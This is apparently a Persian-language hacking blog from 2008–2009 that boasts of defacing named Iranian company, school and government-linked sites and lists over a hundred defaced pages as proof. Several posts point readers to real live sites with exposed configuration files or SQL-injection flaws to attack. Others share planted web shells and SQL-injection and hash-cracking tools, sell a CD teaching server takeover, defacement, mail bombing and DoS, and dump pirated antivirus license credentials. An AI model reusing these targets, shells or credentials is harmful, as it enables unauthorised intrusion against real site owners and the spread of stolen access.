تبليغاتX
هک کردن سایتها و سرورها

md5

MD5

md5

http://md5.blogfa.com

هک کردن سایتها و سرورها

هک کردن سایتها و سرورها

هک کردن سایتها و سرورها

سلام دوستان برای قرار دادن تبلیغات میتونین با ایمیل زیر در تماس باشین shabestan227@gmail.com هک کن تا هک نشی

هک کردن سایتها و سرورها

 
کاربر مهمان، خوش آمديد!    
 
فهرست اصلی
لينکهاي سريع
صفحه اول
آرشيو
ايميل
موضوعات





آرشيو مطالب

لينکستان
اگر مي خواهيد با وبسايت ما تبادل لينک کنيد لينک ما را با نام " هک کردن سایتها و سرورها " قرار دهيد و در بخش تماس با ما و يا نظرات لينک خود را قرار دهيد.


تبليغات





MySQL Hash Cracker

اینم ابزاری برای Crack هش های mysql که دوستان نیاز داشتن .

لینک دانلود

MD5 سه شنبه پنجم آبان 1388  نظر بدهید!

تارگت LFI و SQL

از طریق LFI فایل کانفیگ رو خوندیم .

LFI-Config

و اینم یه SQL که از طریق load_file تونستیم Passwd رو بخونیم .

SQL Load_File


MD5 پنجشنبه دوم مهر 1388  نظر بدهید!

آب و فاضلاب کشور

آب هم آبهای قدیم

http://nww.co.ir

http://zone-hc.net/archive/mirror/bf8913d.html

MD5 دوشنبه سی ام شهریور 1388  نظر بدهید!

موسسه آموزش عالی روزبهان

اینم از سایت روزبهان امیدوارم به فکر امنیت سایت و سرور خودشون باشن

http://rozbahan.ac.ir

لینک اثبات : http://zone-hc.net/archive/mirror/53fc5b6.html

MD5 دوشنبه سی ام شهریور 1388  نظر بدهید!

sqliHelper 2.7

بهترین ابزار SQL  کافیه فقط آدرس سایت رو بهش بدین ُSupports Mysql , Mssql , Msaccess

لینک دانلود

MD5 شنبه سی ام خرداد 1388  نظر بدهید!

Wordlist generator

خوب حتما همتون دیدین برنامه ها و اسکریپتهایی هستن که میان برای شما کلمه یا عدد بر اساس رنجی که میدی براتون درست میکنه معمولا همشون یه مشکلی دارن اما امروز یه اسکریپت براتون آوردم که کارش حرف نداره زمانی که شما میخواین یه سایت یا هر چیزی رو بروتس کنین نیاز به پس لیست دارین اینجاست که میتونین بهترین پس لیست رو برای خودتون با این اسکریپت درست کنین .

لینک

wg.pl -l 1 -u 6 -v 1234567890 > words.txt

MD5 پنجشنبه بیست و هشتم خرداد 1388  نظر بدهید!

سایت نانو

شبکه شرکتهای فناوری نانو هم هک شد امیدوارم به فکر امنیت سایت و سرور خودشون باشن .

http://www.inbn.ir/images/

قبلا ثبت شده نتونستم ثبت کنم اما عکس گرفتم

http://ariyann.persiangig.com/pic/nano.jpg


MD5 چهارشنبه بیست و هفتم خرداد 1388  نظر بدهید!

سایت شرکت تراشه پردازان جایگاه خوش آمدید

سایت شرکت تراشه پردازان جایگاه که مربوط به سوختو اینجور چیزا بود هک شد امیدوارم به فکر امنیت سایت و سرور خود باشن 

http://www.tpj-electronic.com

لینک اثبات : http://zone-hc.net/archive/mirror/481361d.html

MD5 شنبه بیست و سوم خرداد 1388  نظر بدهید!

CD Hacking

CD Hacking آماده شده توضیحاتی درباره این CD من میدم .
این CD شامل بخش ۱- مقالات ۲- نرم افزار ۳- اموزشهای تصویری هستش .
در این CD چه چیزهایی را یاد میگیرید ؟
مقالات :
۱- مفاهیم ایتدایی لینوکس ۲- مبانی شبکه که شامل چند بخشه ۳- آموزش اکسپلویت نویسی یا همون نوشتن کدهای مخرب ۴- آموزش کامل FTP با تمام ریزه کاری ها ۵- پویش به روشIDLE - آشنای کامل با دستورات لینوکس ۶- مفاهیم اولیه پوسته در لینوکس ۷- مباحثی در مورد پروتکل ها ۸- توضیح کامل درباره Buffer OverFlow که خودش به چند بخش تقسیم میشه ۹- مقالات کامل در باره DOS که به طور کامل توضیح داده شده ۱۰- مقاله درباره گوگل هکینگ و ... مقالات زیادی را در این CD گذاشتم که ۱۰۰٪ تو هک کردن کمکتون میکنه
آموزش های تصویری :
۱- به دست آوردن لیست یوزر و پس FTP و کانکت شدن با نرم افزار Filezilla و در اختیار گرفتن کل سرور
۲- هک سایتها (سرورهای تحت ویندوزIIS )
۳- دانلود کردن پرتالها و اسکن کردن با اکسپلویت (RFI اسکنر) و پیدا کردن باگ داخل پرتال و تبدیل به اکسپلویت کردن و در آخر هم نفوذ
۴- بمب کردن میل افراد با یه برنامه PHP
۵- DOS کردن سایت با اکسپلویت پرل جدید و Priv8

6- مهم تر از همه یاد میگیرین سایتها Bootiran.org وtmtf.ir , teezhushan.com , asiagroup.ir , pdc-co.ir که هک شدن از چه روشی بوده از اول بهتون آموزش داده میشه زمانی که باگ پیدا میکنیم و بعد حمله به سرور و بعد هم دفیس این سایتها , سایتهای دیگه هم هستش که من اسمشو اینجا نمیارم ,  و در آخر خدمتتون عرض کنم که هیچ کسی نمیاد اینا رو براتون فیلم کنه و تو سیدی بزنه به درخواست عده ای از دوستان این کار انجام شد تا زودتر یه هکر قدرتمند بشین
۶- فیلمهای خارجی و ....
7-
آشنایی با انواع اکسپلویت ها ( ارائه اکسپلویت های عمومی و غیر عمومی و روش کاربرد آنها )
8-
آشنایی با ابزار توانمند متااسپلویت و نحوه نصب و راه اندازی این ابزار ( فیلم های آموزشی متعدد)
9-
آشنایی با انواع شل اسکریپت ها و نحوه دسترسی به محتویات سرور ها و سایت ها
10-
مجموعه ای از فیلم های آموزشی کاملا فارسی
11-
آموزش استفاده از گوگل هکینگ در پیدا کردن سایت های آسیب پذیر (مقالات کاملا حرفه ای و فارسی)
12-
اشنایی با روش های هک سایت ( آشنایی با روش های SQL INJECTIOn - XSS -RFI-Remote command executaion ,...)
13-
اشنایی با روش های هک سرور ( سرور های ویندوز و لینوکس و نحوه بدست آوردن ROOT با استفاده ازاکسپلویت های محلی)
14-
آشنایی با روش های کلاینت هکینگ بدون ارسال حتی یک فایل ( روش های کاملا پیشرفته )
15-
فیلم های آموزشی فارسی و انگلیسی از گروه های معتبر هک در دنیا
16-
اشنایی با انواع روش های نفوذ در سایت ها
17-
مجموعه از از اکسپلویت های Priv8
18-
مجموعه بي نظير از سورس نرم افزار هاي جاسوسي
نرم افزار :
۱- فقط میتونم بگم برنامه هایی هستن که گروههای بزرگ هک میان خودشان ردو بدل میکنن و بدست آوردن آنها کاره ساده ای نیست و در کناره این برنامه ها یه برنامه هم واسه هک وبلاگ گذاشتم.
این CD تضمین میکنه که بتونین سرورهای زیادی را مورد حمله قرار بدین و بتونین سایتهای زیادی را دیفیس کنین .
خوب حالا بریم سر اصل مطلب تعداد سیدی ۲ عدد . قیمت 20.000 تومان

جهت كسب اطلاعات بيشتر  در تماس باشيد.

shabestan227@gmail.com

MD5 سه شنبه پنجم خرداد 1388  نظر بدهید!

مرکز آموزشی فرزانگان هک شده

مرکز آموزشی فرزانگان یا همون تیزهوشان هک شده امیدورام به فکر امنیت سایت و سرورشون باشن

حالا بگین ببینم من باهوش ترم یا اونا ؟

http://teezhushan.com

لینک اثبات: http://zone-hc.net/archive/mirror/6a453b1.html

MD5 دوشنبه بیست و هشتم اردیبهشت 1388  نظر بدهید!

چند تا Sql Vunl

سلام گفتیم امروز یه چند تا سایت بذاریم که اسیب پذیری Sql دارن تا بچه ها روش کار کنن

در ضمن خ و ا ه ر م ا د ر اون ادمو من گ ا ی ی د م که کپی پیست کنه اما منبع رو نگه 

لینک 1

لینک 2

لینک 3

لینک 4

لینک 5


MD5 دوشنبه بیست و هشتم اردیبهشت 1388  نظر بدهید!

asiagroup.ir هک شد

asiagroup.ir هک شد امیدوارم به فکر امنیت سایت و سرورشون باشن 

http://asiagroup.ir/

لینک اثبات : http://zone-hc.net/archive/mirror/d230a12.html

MD5 یکشنبه بیست و هفتم اردیبهشت 1388  نظر بدهید!

سایت pdc-co هک شد

سلام سایت pdc-co هم هک شد امیدوارم به فکر امنیت سایت و سرورشون باشن

http://pdc-co.ir

لینک اثبات : http://zone-hc.net/archive/mirror/1294f3c.html


MD5 جمعه بیست و پنجم اردیبهشت 1388  نظر بدهید!

Bootiran هک شد

اینم از Bootiran امیدوارم به فکر امنیت سایت و سرورشون باشن

http://www.forum.bootiran.org

لینک اثبات : http://zone-hc.net/archive/mirror/64d334d.html

MD5 پنجشنبه بیست و چهارم اردیبهشت 1388  نظر بدهید!

شرکت تعاونی مسکن سازمان تامین اجتماعی فارس

اینم از هک شدن شرکت تعاونی مسکن سازمان تامین اجتماعی فارس , امیدوارم به فکر امنیت سایت و سرورشون باشن

http://tmtf.ir

لینک اثبات : http://zone-hc.net/archive/mirror/98015d7.html

MD5 چهارشنبه بیست و سوم اردیبهشت 1388  نظر بدهید!

شل برای تمرین شما

اینم یه شل برای تمرین شما پاک نکنین اگه بیام ببینم پاک شده باشه دیگه شل نمیذارم تا تمرین کنیناز این به بعد به شل ها پسورد میدم تا فقط اونایی که تو خبرنامه عضو هستن بتونن از شل استفاده کنن پس زودتر تو خبرنامه عضو بشین

شل

MD5 چهارشنبه بیست و سوم اردیبهشت 1388  نظر بدهید!

magic_quotes_on

در این فیلم یاد میگیرین که که زمانی که magic_quotes_on هستش بتونین bypass کنین و تو اینجکت به مشکل بر نخورین و همچنین شما با Limit هم آشنا میشین تو این فیلم شما خیلی چیزهارو یاد میگیرین از من میشنوین این فیلمو از دست ندین 

لینک دانلود

MD5 سه شنبه بیست و چهارم دی 1387  نظر بدهید!

Access Inject

در این فیلم یاد میگیرین که چطور  Access  را اینجکت کنین با یه متد جدید و سایتهای دیگر را با همین متد مورد حمله قرار بدین فیلم جالبی هستش پیشنهاد میکنم حتما ببینین

لینک دانلود

 

MD5 سه شنبه بیست و چهارم دی 1387  نظر بدهید!

فروم هک

اینم فروم هک واسه اونایی که دوست دارن هکر بشن

http://www.h4ckcity.net/forum

 

 

MD5 دوشنبه نهم دی 1387  نظر بدهید!

Hacked By All Iranian Hackers

هک شدن بیش از 100 سایت ایرانی به دلیل نشان دادن اعتراض تمام هکر های ایرانی در مقابل فیلترینگ های متعدد سایت های هکینگ و امنیتی ایرانی .

همانطور که میدانید همه سایتهای هکینگ ایران دونه به دونه دارن فیلتر میشن و هکر ها رو هم دزد خطاب کردند دلیل این امر هنوز مشخص نیست .

اما بعضی از هکرها نتونستن طاقت بیارن و حمله به سرورهای ایرانی را شروع کردن و در اولین پروژه بیشتر از  ۱۰۰ سایت ایرانی حمله کردن هیچ کس این هکرها را نمیشناسه هر کی شناخت به منم بگه هه هه هه

لیست سایتهای هک شده

http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8157710/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8157698/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8157696/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8157694/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8157693/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8157692/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8157690/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8157684/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8157682/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8157681/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8157678/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8157677/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8157667/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8157665/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8157663/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8157656/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8157651/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8157650/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8157649/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8157638/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8157635/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8157634/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8157629/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8157616/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8157613/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8157608/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8157604/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8157602/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8157601/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158104/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158105/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158106/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158107/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158108/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158109/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158110/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158111/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158112/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158113/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158115/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158116/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158117/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158118/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158119/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158120/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158120/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158120/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158121/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158122/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158123/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158124/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158125/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158126/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158127/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158127/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158129/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158131/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158134/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158135/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158136/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158137/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158138/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158139/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158140/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158141/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158144/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158145/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158146/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158149/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158150/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158151/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158152/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158148/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158154/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158156/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158158/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158161/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158162/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158164/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158166/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158170/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158172/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158174/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158175/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158182/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158184/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158186/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158187/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158188/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158189/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158190/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158191/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158193/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158194/
http://www.zone-h.org/component/option,com_mirrorwrp/Itemid,160/id,8158196/

MD5 دوشنبه بیست و هفتم آبان 1387  نظر بدهید!

shellcod666

در این فیلم آموزشی یاد میگیرین چطور با داشتن شل از سرور Windows بتونین CMD رو در دست بگیرین .

لینک دانلود

MD5 چهارشنبه بیست و چهارم مهر 1387  نظر بدهید!

CGI Hacking

سلام دوستان مقاله ای در مورد CGI Hacking

CGI Hacking

 

MD5 یکشنبه هفتم مهر 1387  نظر بدهید!

Securing Your ApplicationS

مقاله ای در مورد محفوظ نگهداشتن اسناد

لینک دانلود

 

MD5 شنبه بیست و ششم مرداد 1387  نظر بدهید!

امن کردن فايلهاي اکسس

مقاله ای در مورد امن کردن فایلهای اکسس

لینک دانلود

 

MD5 چهارشنبه نهم مرداد 1387  نظر بدهید!

Crawler

سلام دوستان اگر یادتون باشه قبلان اسکنری رو بهتون معرفی کردم که آسیب پذیری RFI-LFI-SQL-XSS رو به صورت لینک http://www.ignorminious.co.uk/index.php?page= میگرفت .

ولی در پی پروژه ای که با دوست خوبم Higher_sense دنبالش رو گرفتیم بر آن شدیم تا این اسکنر قوی را کامل کنیم و با تغییرات بسیار علاوه بر کامل کردن آن قدرتش در یافتن آسیب پذیریها , نتایج رو در یک فایل متنی ذخیره میکند . دیگه نیاز نیست شما صفحه آسیب پذیری را به اسکنر بدین اسکنر خودش سایت رو اسکن میکنه و بهتون باگ رو میده کافیه آدرس سایت رو به اسکنر بدین . مثال :
www.ignorminious.co.uk فیلم آموزشی گویای همه چیز هست .

دانلود فیلم آموزشی

 

MD5 چهارشنبه بیست و ششم تیر 1387  نظر بدهید!

باگ کانفینگ

امروز هم یه چند تا سایت واستون میذارم که باگ کانفینگ دارن 


http://hotvideoblog.com/include/conf.ini
http://www.nmmg.org/include/conf.ini
http://www.sex2ube.com/include/conf.ini
http://www.rinox.de/include/conf.ini
http://www.tubedesi.com/include/conf.ini
http://www.12stairs.com/include/conf.ini
http://www.commercialhpc.com/include/conf.ini

MD5 جمعه بیست و چهارم خرداد 1387  نظر بدهید!

priamos-sql injection tool

خوب ابنم ابزاری که آقا ناصر خواسته بود کارش اینه که به راحتی میتونید تمام تیبل ها و ستونها و اطلاعات داخلش رو از سایت هایی که مشکل اینجکشن دارن بیرون بکشید و دیگه نیاز به اجرای دستورات از طریق بروزر ندارین.

برای اینکه این برنامه بالا بیاد باید Net Framework نصب باشه رو سیستم شما

لینک دانلود

MD5 چهارشنبه بیست و دوم خرداد 1387  نظر بدهید!

آشنایی با اکسپلویتها

در این مقاله شما با اکسپلویتها و کاربرد هر یک از آنها آشنا میشوید .

لینک دانلود

MD5 سه شنبه بیست و یکم خرداد 1387  نظر بدهید!

مرجع کامل ترفندهای رجیستری ویندوز

در این مقاله 127 صفحه ای فارسی که به صورت فایل PDF قابل دریافت است ترفندهای بسیار زیادی درباره کار با رجیستری ویندوز ارایه شده است.

لینک دانلود

MD5 دوشنبه بیستم خرداد 1387  نظر بدهید!

يك پكيج كامل از كدهاي جاوا اسكريپ

يك پكيج كامل از كد هاي جاوا اسكريپت يكي از هداياي من به شما است  كه اميد وارم از اون راضي باشيد كه مطمئنم مي شيد چون در نوع خودش بي نظيره و همه احتياجات شما رو  به كدهاي جاوا اسكريپت بر آ ورده مي كنه

لینک دانلود

MD5 یکشنبه نوزدهم خرداد 1387  نظر بدهید!

Priv8 Online Compiler

سلام بعضی ها تو کامپایل کردن اکسپلویت مشکل داشتن و مرتب به من پم میدادن که آقا اینو واسمون کامپایل کن اونو واسمون کامپایل کن یه سایت هستش که کارش حرف نداره

http://exploitworld.homeunix.org/compile 

Username : gosc

Password : gosc

MD5 پنجشنبه شانزدهم خرداد 1387  نظر بدهید!

JAA-SQl-XSS

سلام دوستان امیدوارم حالتون خوب باشه الان که دارم آپ میکنم ساعت ۱۲هستش که از بی خوابی دارم ... میشم ولی من همیشه به فکرتون هستم یه اسکنر گیرم اومده که خدایش من جایی ندیدم کارش حرف نداره  خودم تعریف کنم به درد نمیخوره میذارم تا خودتون در موردش نظر بدین .

رو هوا Xss- Sql رو بهتون میده  اسکنر رو میتونین از اینجا دانلود کنین

MD5 چهارشنبه پانزدهم خرداد 1387  نظر بدهید!

Root

سلام مجدد  امروز هم یه مقاله کامل که درباره چگونگی به دست آوردن اکانت root در دسترسی های محلی هستش رو واستون میذارم تا استفاده بکنین دو تا شل هم واستون میذارم که یه خورده تمرین کنین.تا پست بعدی بای .

لینک دانلود

شل 1

شل2

MD5 یکشنبه دوازدهم خرداد 1387  نظر بدهید!

XMD5 Cracker

سلام دوستان امیدوارم که حالتون مثل گذشته خوب باشه یکی از دوستان برنامه خواسته بود واسه کرک کردن پسوردهای MD5 من قبلا یه برنامه گذاشته بودم کارایی خوبی داشت امروز هم یه برنامه دیگه واستون میذارم سرعتشم خیلی بالاست برنامه رو میتونین از آخر پست دانلود کنین سایتهای Online هم کنارش میذارم که کارتون راه بیوفته  خداییش دلتون میاد نظر ندین انقدر به فکر شما هستم


http://74.52.200.226/~b4ck/passhash/index.php
TMTO[dot]ORG
md5.rednoize.com - reverse engineer md5 hashes - powered by rednoize.com
http://nz.md5.crysm.net
md5 reverse lookup
http://www.xmd5.org
GData: An Online MD5 Hash Database
[ md5 crack password crack hash checker ]
http://passcracking.ru
milw0rm.com - free md5/lm hash cracking
http://plain-text.info
SecurityStats.Com Awareness Tools - Dictionary Based Hash Lookup
Project md5(); decrypt site
http://passcrack.spb.ru/
http://shm.pl/md5/
http://www.und0it.com/
md5在线破解系统|md5在线解密|md5破解| md5在线破解|md5解密|md5crack
Reverse MD5 hash lookup
Md5 Decrypt.com, Md5 Encryption, Free MD5 Encryptor, Security, MD5 Hash, MD5 Security.
md5's me
Reverse MD5 Hash-Lookup + hash post bY ToXiC
MD5 Decrypter.com, MD5 Decryption, Free MD5 Decryptor, Security, MD5 Hash, MD5 Security.
MD5 Encryption: Encrypt & Decrypt MD5 Hashes
HostMonster - Web hosting
MD5-Decrypter by xpzone.de
MD5 cracker
HashReverse.com - Reversing your SHA1 and MD5 hashes.
md5 reverse lookup,Md5 crack
md5 hash database project
MD5 Online TRANSL(Crack) Datebases lookup of Tools
http://www.thepanicroom.org/index.php?view=cracker
http://rainbowtables.net/services/results.php )
http://rainbowcrack.com/
http://www.securitydb.org/cracker/
0ptix Hosting Services
https://www.astalavista.net/?cmd=rainbowtables
Ice Breaker : Online MD5 Reverser | SHA1 Reverser || URL Encodeur/Decodeur
md5 cracker - The fastest way to recover your lost passwords - Home
http://www.pldsecurity.de/forum/md5.php
http://www.xeons.net/genesis/
Gagner De L'argent
Your website has been suspended!
MD5 Encryption & Decryption | MD5 Decode / Decoder
MD5 cracker
MD5-crack - tydal.nu
http://ivdb.org/search/md5/
Domini, hosting, hosting professionale, hosting veloce, hosting economico
D

لینک دانلود

MD5 جمعه دهم خرداد 1387  نظر بدهید!

3Scan

سلام دوستان در این فیلم آموزشی شما با یه اسکنر Full Priv8 آشنا میشین کار این اسکنر این هستش که سایت رو از نظره XSS - LFI - RFI  چک میکنه و باگ رو بهتون میده پیشنهاد میکنم حتما این فیلم آموزشی رو ببینین .

جا داره در اینجا از دوست خوبم higher_sense تشکر کنم که تو کارام خیلی کمکم میکنه

لینک دانلود

MD5 پنجشنبه نهم خرداد 1387  نظر بدهید!

آنتی ویرویسی فوق العاده قدرتمند ESET NOD32 Antivirus 3.0.642

سلام دوستان امیدوارم حالتون خوب باشه در این پست گفتم آنتی ویروس بذاریم تا امنیت سیستم شما بره بالا البته اینم بگم امنیت هیچوقت ۱۰۰٪ نمیشه ولی با نصب آنتی ویروس Nod32 میتونین جلوی خیلی چیزها رو بگیرین

طبق برسی های به عمل آمده از آنتی ویروسها Nod32 بهترین آنتی ویروس شناخته شده و الان تو هر وبلاگ یا هر سایتی برین این آنتی ویروس را مشاهده میکنین و جالب اینجا هستش که همه نسخه کرک را گذاشتن برای دانلود .

آنتی ویروس را میتونین از آخر همین پست دانلود کنین و من واستون هر هفته یوزر و پس جدید میذارم تا بتونین آنتی ویروس را به صورت کامل آپدیت کنین.

در ضمن یوزر و پس های جدید که هر هفته واستون میذارم تو همین پست هستش تو پست جدید نمیذارم یعنی یوزر و پس هایی که کار نمیکنه رو برمیدارم و به جای آن یوزر و پس های جدید میذارم پس اشتباه نکنین یه موقع که بگین یوزر و پس جدید چرا گذاشته نمیشه برای Nod32 .

از دست بعضی از دوستان ناراحتم که مطالب وبلاگ منو کپی میکنن جای دیگه حالا بماند کجا خودشون میدونن و منبع آن را ذکر نمیکنن خواهشا مطلبی که بر میدارین و جای دیگه میذارین با ذکر منبع باشه.

لینک دانلود

=============================================================

UserName: EAV-03686543
Password: a7pdvr535x

UserName: EAV-03686544
Password: fpwn3ptjtk

UserName: EAV-03418364
Password: c3anmpdre2

UserName: EAV-02665843
Password: r8xwusha2c

UserName: EAV-02597560
Password: 4xsj4756uw

UserName: EAV-03557597
Password: ju4sk3rt6j

UserName: EAV-02665878
Password: xv2u6sfd4j

UserName: EAV-03686536
Password: xrcjcm3rds

UserName: EAV-03686523
Password: 4ajt2d4t33

UserName: EAV-03686531
Password: sv4tjb6bhn

UserName: EAV-03686275
Password: penuuf6kaw

UserName: EAV-02665864
Password: dxvxa53p5f

UserName: EAV-03531690
Password: prt3275xxc

UserName: EAV-03534333
Password: sfsp58hj8e

UserName: EAV-03650222
Password: apnrd72ajd

UserName: EAV-02710776
Password: n6uf227hcv

UserName: EAV-03280167
Password: p5rw4w4sdc

UserName: EAV-03534333
Password: sfsp58hj8e

UserName: EAV-03531690
Password: prt3275xxc

UserName: EAV-03693225
Password: adfeeu2ss4

UserName: EAV-03690228
Password: x27hwhnddf

UserName: EAV-03686537
Password: dv5hj2rtmh

UserName: EAV-03686534
Password: 83vrrpuerd

UserName: EAV-03686541
Password: 2j5pub5eku

UserName: EAV-03686546
Password: a3ws7uhtsr

UserName: EAV-03557597
Password: ju4sk3rt6j

UserName: EAV-03686310
Password: 4kw3cet73p

UserName: EAV-03650514
Password: fm53f3wkd4

UserName: EAV-03650446
Password: w2p2c4fddw

UserName: EAV-02666224
Password: h3u2aexpdr

UserName: EAV-02665887
Password: t3t5um8d8r

UserName: EAV-02710070
Password: 4esjeanxxm

UserName: EAV-02568221
Password: pa42je8unb

UserName: EAV-03642368
Password: 567hwckf74

UserName: EAV-03522693
Password: vdrhbd4x48

UserName: EAV-03466853
Password: 5u5acvvbc8

MD5 چهارشنبه هشتم خرداد 1387  نظر بدهید!

FTP_Command

سلام دوستان گفتم وبلاگ رو آپ کنم یه خورده هم به فکر بچه ها باشیم خوب از اسمش معلومه که این مقاله مربوط به چه چیزی میشه .

یکی از دوستان سوال کرده بود که کار کردن تو محیط شل با شلر r57 رو واسه ما فیلم درست کن اتفاقا تو فکرش هستم چون خیلی وقته فیلم آموزشی درست نکردم چشم حتما آموزش رو میذارم براتون .

از دوستانی که تو این آپ واسه سوال های خودشون جواب دریافت نکردن علتش این هستش که بیشتر سوالها مبتدی بودش و همانطور که میدونید این وبلاگ در مورد هک کردن سایتها و سرورها هستش .

جا داره از همه دوستانی که نظر میدن تشکر کنم و شرمنده از این که دیر آپ میکنم اونایی که میشناسن منو میدونن که چقدر سرم شلوغه ولی با این همه کار هیچوقت تنهاتون نمیذارم

تا پست بعدی بای

لینک دانلود 

MD5 سه شنبه هفتم خرداد 1387  نظر بدهید!

هک شدن 61 سایت ایرانی و خارجی

سلام دوستان تو این پروژه تونستم به چند تا سرور نفوذ کنم و بالای 1000 تا سایت رو سرورها بودش و به دلیل استفاده از Dial-Up و سرعت کم مجبور شدم سرور را رها کنم و تا اونجایی که سرعت اینترنت به من حال داد منم به سرور حال دادم و 6۱ تا سایت را دیفیس کردم .

لیست سایتهای هک شده :

http://tarazpearl.com

http://zobaran.com
http://zamzam.co.ir
http://wirtgenir.com
http://vazinfar.com
http://yazdan.wri.ac.ir

http://ssecompany.com
http://soilmecir.com
http://sobhanyara.com
http://sms1.ir
http://sinagostar.com
http://simabtech.com
http://sharghcement.ir
http://sharghandishan.com
http://shadilon.com
